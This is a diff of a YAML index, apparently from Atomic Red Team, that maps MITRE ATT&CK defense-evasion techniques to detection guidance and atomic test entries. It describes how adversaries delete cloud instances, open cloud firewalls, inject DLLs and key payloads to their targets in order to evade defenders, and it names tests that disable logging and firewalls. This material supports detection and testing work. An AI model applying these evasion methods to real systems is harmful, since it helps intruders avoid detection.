+ - source_name: AWS CloudTrail Search
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ - source_name: Azure Activity Logs
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Delete Cloud Instance
+ description: |-
+ An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
+
+ An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-17T19:53:14.784Z'
+ created: '2020-06-16T17:23:06.508Z'
+ x_mitre_detection: |-
+ The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
+
+ In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)
x_mitre_data_sources:
- - AWS CloudTrail logs
+ - GCP audit logs
- Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
+ - Azure activity logs
+ - AWS CloudTrail logs
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1140:
technique:
@@ -22133,30 +22748,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:07:11.799Z'
+ modified: '2020-07-09T14:42:23.122Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
-
- Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Red Canary
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
x_mitre_defense_bypassed:
- Anti-virus
- Host intrusion prevention systems
- Signature-based detection
- Network intrusion detection system
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Red Canary
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
+
+ Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
@@ -22231,21 +22848,21 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-01-30T22:27:39.932Z'
created: '2017-05-31T21:30:20.934Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - API monitoring
- x_mitre_defense_bypassed:
- - File monitoring
- - File system access controls
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - File monitoring
+ - File system access controls
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1562.002:
technique:
@@ -22272,20 +22889,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:02:33.870Z'
created: '2020-02-21T20:46:36.688Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Log analysis
+ x_mitre_detection: Monitor processes and command-line arguments for commands
+ that can be used to disable logging. Lack of event logs may be suspicious.
x_mitre_data_sources:
- Process monitoring
- Windows event logs
- Process command-line parameters
- x_mitre_detection: Monitor processes and command-line arguments for commands
- that can be used to disable logging. Lack of event logs may be suspicious.
- x_mitre_defense_bypassed:
- - Log analysis
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
identifier: T1562.002
atomic_tests:
- name: Disable Windows IIS HTTP Logging
@@ -22310,6 +22927,57 @@ defense-evasion:
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
+ T1562.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.007
+ url: https://attack.mitre.org/techniques/T1562/007
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
+ 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Disable or Modify Cloud Firewall
+ description: "Adversaries may disable or modify a firewall within a cloud environment
+ to bypass controls that limit access to cloud resources. Cloud firewalls are
+ separate from system firewalls that are described in [Disable or Modify System
+ Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
+ typically utilize restrictive security groups and firewall rules that only
+ allow network activity from trusted IP addresses via expected ports and protocols.
+ An adversary may introduce new firewall rules or policies to allow access
+ into a victim cloud environment. For example, an adversary may use a script
+ or utility that creates new ingress rules in existing security groups to allow
+ any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling
+ a cloud firewall may enable adversary C2 communications, lateral movement,
+ and/or data exfiltration that would otherwise not be allowed."
+ id: attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-07T13:49:05.345Z'
+ created: '2020-06-24T16:55:46.243Z'
+ x_mitre_contributors:
+ - Expel
+ x_mitre_detection: Monitor cloud logs for modification or creation of new security
+ groups or firewall rules.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ atomic_tests: []
T1562.004:
technique:
external_references:
@@ -22334,20 +23002,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:18:11.166Z'
created: '2020-02-21T21:00:48.814Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Firewall
+ x_mitre_detection: Monitor processes and command-line arguments to see if firewalls
+ are disabled or modified. Monitor Registry edits to keys that manage firewalls.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Windows Registry
- x_mitre_detection: Monitor processes and command-line arguments to see if firewalls
- are disabled or modified. Monitor Registry edits to keys that manage firewalls.
- x_mitre_defense_bypassed:
- - Firewall
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1562.004
atomic_tests:
- name: Disable iptables firewall
@@ -22417,6 +23085,22 @@ defense-evasion:
elevation_required: true
T1562.001:
technique:
+ created: '2020-02-21T20:32:20.810Z'
+ modified: '2020-03-29T21:52:43.151Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579
+ description: Adversaries may disable security tools to avoid possible detection
+ of their tools and activities. This can take the form of killing security
+ software or event logging processes, deleting Registry keys so that tools
+ do not start at run time, or other methods to interfere with security tools
+ scanning or reporting information.
+ name: Disable or Modify Tools
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1562.001
@@ -22424,22 +23108,6 @@ defense-evasion:
- external_id: CAPEC-578
source_name: capec
url: https://capec.mitre.org/data/definitions/578.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Disable or Modify Tools
- description: Adversaries may disable security tools to avoid possible detection
- of their tools and activities. This can take the form of killing security
- software or event logging processes, deleting Registry keys so that tools
- do not start at run time, or other methods to interfere with security tools
- scanning or reporting information.
- id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T21:52:43.151Z'
- created: '2020-02-21T20:32:20.810Z'
x_mitre_platforms:
- Windows
- macOS
@@ -22932,6 +23600,27 @@ defense-evasion:
elevation_required: true
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -22948,27 +23637,6 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -23025,10 +23693,12 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-25T20:51:30.829Z'
created: '2020-02-11T19:05:02.399Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - API monitoring
+ - DLL monitoring
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor for calls to OpenProcess that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -23043,12 +23713,10 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -23086,12 +23754,13 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
@@ -23099,14 +23768,37 @@ defense-evasion:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1055.001:
technique:
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
+ in order to evade process-based defenses as well as possibly elevate privileges.
+ DLL injection is a method of executing arbitrary code in the address space
+ of a separate live process. \n\nDLL injection is commonly performed by writing
+ the path to a DLL in the virtual address space of the target process before
+ loading the DLL by invoking a new thread. The write can be performed with
+ native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
+ then invoked with CreateRemoteThread (which calls the LoadLibrary
+ API responsible for loading the DLL). (Citation: Endgame Process Injection
+ July 2017) \n\nVariations of this method such as reflective DLL injection
+ (writing a self-mapping DLL into a process) and memory module (map DLL when
+ writing into process) overcome the address relocation issue as well as the
+ additional APIs to invoke execution (since these methods load and execute
+ the files in memory by manually preforming the function of LoadLibrary).(Citation:
+ Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July
+ 2017) \n\nRunning code in the context of another process may allow access
+ to the process's memory, system/network resources, and possibly elevated privileges.
+ Execution via DLL injection may also evade detection from security products
+ since the execution is masked under a legitimate process. "
+ name: Dynamic-link Library Injection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1055.001
@@ -23120,37 +23812,13 @@ defense-evasion:
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
source_name: Endgame HuntingNMemory June 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic-link Library Injection
- description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
- in order to evade process-based defenses as well as possibly elevate privileges.
- DLL injection is a method of executing arbitrary code in the address space
- of a separate live process. \n\nDLL injection is commonly performed by writing
- the path to a DLL in the virtual address space of the target process before
- loading the DLL by invoking a new thread. The write can be performed with
- native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
- then invoked with CreateRemoteThread (which calls the LoadLibrary
- API responsible for loading the DLL). (Citation: Endgame Process Injection
- July 2017) \n\nVariations of this method such as reflective DLL injection
- (writing a self-mapping DLL into a process) and memory module (map DLL when
- writing into process) overcome the address relocation issue as well as the
- additional APIs to invoke execution (since these methods load and execute
- the files in memory by manually preforming the function of LoadLibrary
- ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process
- Injection July 2017) \n\nRunning code in the context of another process may
- allow access to the process's memory, system/network resources, and possibly
- elevated privileges. Execution via DLL injection may also evade detection
- from security products since the execution is masked under a legitimate process. "
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:32:05.210Z'
+ modified: '2020-06-20T22:17:59.148Z'
created: '2020-01-14T01:26:08.145Z'
x_mitre_platforms:
- Windows
@@ -23178,7 +23846,7 @@ defense-evasion:
- File monitoring
- API monitoring
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
atomic_tests: []
T1548.004:
@@ -23237,27 +23905,103 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T12:04:37.823Z'
created: '2020-01-30T14:40:20.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Jimmy Astle, @AstleJimmy, Carbon Black
- - Erika Noerenberg, @gutterchurl, Carbon Black
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline
executions which may indicate that AuthorizationExecuteWithPrivileges
is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges
is being called. Monitoring OS API callbacks for the execution can also be
a way to detect this behavior but requires specialized security tooling.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Jimmy Astle, @AstleJimmy, Carbon Black
+ - Erika Noerenberg, @gutterchurl, Carbon Black
+ x_mitre_platforms:
+ - macOS
+ atomic_tests: []
+ T1480.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1480.001
+ url: https://attack.mitre.org/techniques/T1480/001
+ - source_name: EK Clueless Agents
+ url: https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
+ description: Riordan, J., Schneier, B. (1998, June 18). Environmental Key
+ Generation towards Clueless Agents. Retrieved January 18, 2019.
+ - source_name: Kaspersky Gauss Whitepaper
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
+ description: 'Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution.
+ Retrieved January 17, 2019.'
+ - source_name: Proofpoint Router Malvertising
+ url: https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
+ description: Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising
+ on Windows, Android Devices. Retrieved January 16, 2019.
+ - source_name: EK Impeding Malware Analysis
+ url: https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
+ description: Song, C., et al. (2012, August 7). Impeding Automated Malware
+ Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
+ - source_name: Environmental Keyed HTA
+ url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
+ description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
+ Explorer/Edge. Retrieved January 16, 2019.
+ - source_name: 'Ebowla: Genetic Malware'
+ url: https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
+ description: 'Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing
+ Payloads for Specific Targets. Retrieved January 18, 2019.'
+ - source_name: Demiguise Guardrail Router Logo
+ url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
+ description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved
+ January 17, 2019.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Environmental Keying
+ description: |-
+ Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
+
+ Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
+
+ Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
+
+ Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
+ id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-24T18:52:12.719Z'
+ created: '2020-06-23T22:28:28.041Z'
+ x_mitre_contributors:
+ - Nick Carr, FireEye
+ x_mitre_detection: Detecting the use of environmental keying may be difficult
+ depending on the implementation. Monitoring for suspicious processes being
+ spawned that gather a variety of system information or perform other forms
+ of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short
+ period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static file analysis
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.005:
technique:
@@ -23295,139 +24039,80 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1480:
technique:
external_references:
- - external_id: T1480
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1480
url: https://attack.mitre.org/techniques/T1480
- source_name: FireEye Kevin Mandia Guardrails
url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- - source_name: EK Clueless Agents
- url: https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
- description: Riordan, J., Schneier, B. (1998, June 18). Environmental Key
- Generation towards Clueless Agents. Retrieved January 18, 2019.
- - source_name: Kaspersky Gauss Whitepaper
- url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
- description: 'Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution.
- Retrieved January 17, 2019.'
- - source_name: Proofpoint Router Malvertising
- url: https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
- description: Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising
- on Windows, Android Devices. Retrieved January 16, 2019.
- - source_name: EK Impeding Malware Analysis
- url: https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
- description: Song, C., et al. (2012, August 7). Impeding Automated Malware
- Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
- - source_name: Environmental Keyed HTA
- url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
- description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved January 16, 2019.
- - source_name: 'Ebowla: Genetic Malware'
- url: https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
- description: 'Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing
- Payloads for Specific Targets. Retrieved January 18, 2019.'
- - source_name: Demiguise Guardrail Router Logo
- url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
- description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved
- January 17, 2019.'
